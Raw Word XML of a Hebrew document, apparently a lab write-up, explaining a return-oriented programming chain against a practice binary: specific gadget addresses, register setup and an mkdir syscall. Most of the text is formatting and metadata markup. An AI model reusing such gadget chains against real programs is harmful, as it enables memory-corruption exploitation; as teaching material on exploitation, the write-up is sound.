    <w:p w14:paraId="0F548AA1" w14:textId="2016E7E2" w:rsidR="007D7856" w:rsidRDefault="007D7856" w:rsidP="007D785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כתובת זה תתבצע הפקודה </w:t>
      </w:r>
      <w:r>
        <w:t>add %r15, %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ובכך נקבל ב-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> את כתובת המחזורת הרצויה.</w:t>
      </w:r>
      <w:r w:rsidR="00D20923">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> משם נקפוץ לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="001B2D1B">
        <w:t>0x401d11</w:t>
      </w:r>
      <w:r w:rsidR="00D20923">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA7C34" w14:textId="2E342742" w:rsidR="001B2D1B" w:rsidRDefault="001B2D1B" w:rsidP="001B2D1B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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות </w:t>
      </w:r>
      <w:r>
        <w:t>0755=0x1ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונכניס ל-</w:t>
      </w:r>
      <w:r>
        <w:t>r15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ערך זבל.</w:t>
      </w:r>
      <w:r w:rsidR="001021CC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> משם נקפוץ לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="001021CC">
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r w:rsidR="001021CC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A74AE" w14:textId="1A756CCE" w:rsidR="008F66F3" w:rsidRDefault="008F66F3" w:rsidP="008F66F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כעת נעדכן את ערך </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות 83=</w:t>
      </w:r>
      <w:r>
        <w:t>0x53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (לקריאת המערכת </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>) ונקפוץ ל-</w:t>
      </w:r>
      <w:r>
        <w:t>0x40114f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שם נבצע </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE23D8" w14:textId="643395DE" w:rsidR="00DD611E" w:rsidRDefault="008F66F3" w:rsidP="001574C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נסיים את הריצה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21998F" w14:textId="035D1B8F" w:rsidR="00651CA4" w:rsidRDefault="00651CA4" w:rsidP="00651CA4">
      <w:pPr>
        <w:bidi/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00651CA4" w:rsidSect="00750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48D02" w14:textId="77777777" w:rsidR="003444CC" w:rsidRDefault="003444CC" w:rsidP="006825DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2EF10D39" w14:textId="77777777" w:rsidR="003444CC" w:rsidRDefault="003444CC" w:rsidP="0068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9FD4" w14:textId="77777777" w:rsidR="003444CC" w:rsidRDefault="003444CC" w:rsidP="006825DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="400568F8" w14:textId="77777777" w:rsidR="003444CC" w:rsidRDefault="003444CC" w:rsidP="00682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B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CC0D5BA"/>
    <w:lvl w:ilvl="0" w:tplc="640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6897"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB9CC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942D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="209C65F4"/>
    <w:lvl w:ilvl="0" w:tplc="3646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5A90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4ACB176"/>
    <w:lvl w:ilvl="0" w:tplc="AF888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BA4E11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="380A53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860B75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC2C5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D27C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B341C64"/>
    <w:lvl w:ilvl="0" w:tplc="382EC4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D94FE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC2C52C8"/>
    <w:lvl w:ilvl="0" w:tplc="A32418DA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5901"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74740A2A"/>
    <w:lvl w:ilvl="0" w:tplc="3F62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E214E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="806ACD2E"/>
    <w:lvl w:ilvl="0" w:tplc="7A188C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8282146">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2089188535">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="517738403">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2119711304">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1886016998">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="373313469">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="784808212">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="93983255">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1512985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4974212">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1120302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22"/>
    <w:rsid w:val="000149C1"/>
    <w:rsid w:val="00060628"/>
    <w:rsid w:val="00063B57"/>
    <w:rsid w:val="00081AA3"/>
    <w:rsid w:val="000C7CEC"/>
    <w:rsid w:val="000D00DC"/>
    <w:rsid w:val="000D407D"/>
    <w:rsid w:val="000E3B4C"/>
    <w:rsid w:val="001021CC"/>
    <w:rsid w:val="00106FB7"/>
    <w:rsid w:val="00112430"/>
    <w:rsid w:val="0012592A"/>
    <w:rsid w:val="00126B4F"/>
    <w:rsid w:val="001574C6"/>
    <w:rsid w:val="001B17A2"/>
    <w:rsid w:val="001B2D1B"/>
    <w:rsid w:val="001C01FE"/>
    <w:rsid w:val="001D461C"/>
    <w:rsid w:val="00212F42"/>
    <w:rsid w:val="00215698"/>
    <w:rsid w:val="002161C2"/>
    <w:rsid w:val="0023528E"/>
    <w:rsid w:val="00235D05"/>
    <w:rsid w:val="00257878"/>
    <w:rsid w:val="00291794"/>
    <w:rsid w:val="002A62A8"/>
    <w:rsid w:val="002B23E0"/>
    <w:rsid w:val="002B5C39"/>
    <w:rsid w:val="002E3CF3"/>
    <w:rsid w:val="002F5B87"/>
    <w:rsid w:val="003100FE"/>
    <w:rsid w:val="003444CC"/>
    <w:rsid w:val="00376D44"/>
    <w:rsid w:val="0039293A"/>
    <w:rsid w:val="00392FAE"/>
    <w:rsid w:val="00397798"/>
    <w:rsid w:val="003D775E"/>
    <w:rsid w:val="003E5385"/>
    <w:rsid w:val="00417D9A"/>
    <w:rsid w:val="0042629C"/>
    <w:rsid w:val="00471711"/>
    <w:rsid w:val="0049091A"/>
    <w:rsid w:val="004945A8"/>
    <w:rsid w:val="004D7DCE"/>
    <w:rsid w:val="004F235E"/>
    <w:rsid w:val="00536C34"/>
    <w:rsid w:val="0055366D"/>
    <w:rsid w:val="00555A1A"/>
    <w:rsid w:val="00575BEE"/>
    <w:rsid w:val="00580C9A"/>
    <w:rsid w:val="005A61AF"/>
    <w:rsid w:val="005B5F12"/>
    <w:rsid w:val="005B7D91"/>
    <w:rsid w:val="005C39F7"/>
    <w:rsid w:val="005E4D96"/>
    <w:rsid w:val="005E6B2B"/>
    <w:rsid w:val="00622F52"/>
    <w:rsid w:val="006236FD"/>
    <w:rsid w:val="00651CA4"/>
    <w:rsid w:val="0066774E"/>
    <w:rsid w:val="00670D8E"/>
    <w:rsid w:val="006763C6"/>
    <w:rsid w:val="006825DB"/>
    <w:rsid w:val="00697622"/>
    <w:rsid w:val="006B65A9"/>
    <w:rsid w:val="006D5026"/>
    <w:rsid w:val="006E7468"/>
    <w:rsid w:val="006F165F"/>
    <w:rsid w:val="00703656"/>
    <w:rsid w:val="00703E95"/>
    <w:rsid w:val="0070559B"/>
    <w:rsid w:val="007355EF"/>
    <w:rsid w:val="007501F1"/>
    <w:rsid w:val="00780F50"/>
    <w:rsid w:val="007A40C8"/>
    <w:rsid w:val="007B75F3"/>
    <w:rsid w:val="007C7A92"/>
    <w:rsid w:val="007D7856"/>
    <w:rsid w:val="007E0534"/>
    <w:rsid w:val="007F1CE2"/>
    <w:rsid w:val="007F4CA9"/>
    <w:rsid w:val="00836DAA"/>
    <w:rsid w:val="0084530B"/>
    <w:rsid w:val="00875372"/>
    <w:rsid w:val="008A1085"/>
    <w:rsid w:val="008B70D2"/>
    <w:rsid w:val="008D68C7"/>
    <w:rsid w:val="008E216B"/>
    <w:rsid w:val="008E30E7"/>
    <w:rsid w:val="008F1F4C"/>
    <w:rsid w:val="008F66F3"/>
    <w:rsid w:val="009011B3"/>
    <w:rsid w:val="009208E9"/>
    <w:rsid w:val="009224D3"/>
    <w:rsid w:val="00935DAB"/>
    <w:rsid w:val="009407BB"/>
    <w:rsid w:val="009475B4"/>
    <w:rsid w:val="00960547"/>
    <w:rsid w:val="00961E17"/>
    <w:rsid w:val="00996911"/>
    <w:rsid w:val="009B514B"/>
    <w:rsid w:val="009B7156"/>
    <w:rsid w:val="009C0D21"/>
    <w:rsid w:val="009D076F"/>
    <w:rsid w:val="009E09C6"/>
    <w:rsid w:val="009E1E18"/>
    <w:rsid w:val="009F75EC"/>
    <w:rsid w:val="00A066C8"/>
    <w:rsid w:val="00A24B80"/>
    <w:rsid w:val="00A44076"/>
    <w:rsid w:val="00A44962"/>
    <w:rsid w:val="00A535E6"/>
    <w:rsid w:val="00A70306"/>
    <w:rsid w:val="00A96380"/>
    <w:rsid w:val="00AA1203"/>
    <w:rsid w:val="00AB7B44"/>
    <w:rsid w:val="00AC5299"/>
    <w:rsid w:val="00AE5937"/>
    <w:rsid w:val="00B01FDE"/>
    <w:rsid w:val="00B07266"/>
    <w:rsid w:val="00B27E91"/>
    <w:rsid w:val="00B5709B"/>
    <w:rsid w:val="00B62819"/>
    <w:rsid w:val="00B7665E"/>
    <w:rsid w:val="00B76CE4"/>
    <w:rsid w:val="00B97BA5"/>
    <w:rsid w:val="00BC2972"/>
    <w:rsid w:val="00BC3DB0"/>
    <w:rsid w:val="00BD19AD"/>
    <w:rsid w:val="00C21213"/>
    <w:rsid w:val="00C214AE"/>
    <w:rsid w:val="00C429D4"/>
    <w:rsid w:val="00C914BB"/>
    <w:rsid w:val="00CA0024"/>
    <w:rsid w:val="00CA687B"/>
    <w:rsid w:val="00CA797E"/>
    <w:rsid w:val="00CB62DF"/>
    <w:rsid w:val="00CC3B8F"/>
    <w:rsid w:val="00CC5EFC"/>
    <w:rsid w:val="00CE327F"/>
    <w:rsid w:val="00CE431E"/>
    <w:rsid w:val="00CE4D60"/>
    <w:rsid w:val="00D16EE5"/>
    <w:rsid w:val="00D20923"/>
    <w:rsid w:val="00D646A2"/>
    <w:rsid w:val="00D73C81"/>
    <w:rsid w:val="00D73F7A"/>
    <w:rsid w:val="00D800EA"/>
    <w:rsid w:val="00DA1D11"/>
    <w:rsid w:val="00DC0359"/>
    <w:rsid w:val="00DC2445"/>
    <w:rsid w:val="00DD611E"/>
    <w:rsid w:val="00E165B2"/>
    <w:rsid w:val="00E30167"/>
    <w:rsid w:val="00E35AEA"/>
    <w:rsid w:val="00E3606C"/>
    <w:rsid w:val="00E57563"/>
    <w:rsid w:val="00E62A92"/>
    <w:rsid w:val="00E76FB9"/>
    <w:rsid w:val="00E81736"/>
    <w:rsid w:val="00E81CA3"/>
    <w:rsid w:val="00E961A0"/>
    <w:rsid w:val="00EB573F"/>
    <w:rsid w:val="00ED1D44"/>
    <w:rsid w:val="00EE1F6B"/>
    <w:rsid w:val="00EF0DCE"/>
    <w:rsid w:val="00F2271D"/>
    <w:rsid w:val="00F34765"/>
    <w:rsid w:val="00F40055"/>
    <w:rsid w:val="00F42D93"/>
    <w:rsid w:val="00F72056"/>
    <w:rsid w:val="00FA42CF"/>
    <w:rsid w:val="00FC3359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7919"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F1BEDB53-36A2-4473-990C-ECFEE09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FE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D7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DB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0068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808C-0A9A-4B90-BBF3-44A880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uy</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>tom guy</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2022-06-07T08:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-07T14:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-07T19:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>